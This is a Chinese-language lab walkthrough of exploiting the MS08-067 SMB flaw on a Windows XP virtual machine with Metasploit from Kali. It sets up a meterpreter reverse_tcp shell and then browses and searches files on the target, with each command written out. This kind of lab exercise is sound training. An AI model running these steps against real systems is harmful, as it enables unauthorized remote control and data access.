使用渗透性测试工具Metasploit进行漏洞测试
环境
windows xp home edition & kali 2018.3 & VMware Workstation Pro 15
配置
VMware配置xp参考链接,kali与其他Linux虚拟机安装无异,kali往期版本的镜像
使用
- VMware的nat模式会自动分配ip,直接使用即可
- windows xp 的ip为192.168.127.134,使用kali进行ping操作
- kali的ip为192.168.127.133,使用windows ping kali
- 在kali虚拟机中打开metasploit
- 输入命令
search ms08_067
,查找关于ms08_067的漏洞模块。
- 输入命令
use exploit /windows/ smb/ms08_067_netapi
使用该模块
- 用
show options
查看该模块需要配置的参数
- 使用命令
set rhost 192.168.127.134
设置靶机IP
- 使用命令
set payload windows/meterpreter/reverse_tcp
设置要执行的payload
- 使用命令
set lhost 192.168.127.133
设置攻击机IP
- 使用命令
show targets
查看操作系统类型
- 由于我装的是
Windows XP Home with Service Pack 3 (x86) - CD (Chinese-Simplified)
,所以使用命令set target 34
设置要攻击的目标操作系统类型
- 使用命令
show options
查看设置
- 最后,输入
exploit
,进入到特殊的payload-meterpreter,该payload在控制靶机之后,能够对靶机执行更多的渗透攻击。
- 使用
pwd
查看当前路径,使用ipconfig
查看网络配置,使用sysinfo
查看系统信息
- 在xp虚拟机里新建一个文件,路径为
C:\NJU\Lhtan\hello.txt
,内容为Hello Lhtian
- 使用命令
search -f *.txt -d C:/
查找刚刚的文件
- 输入exit退出meterpreter,输入save保存配置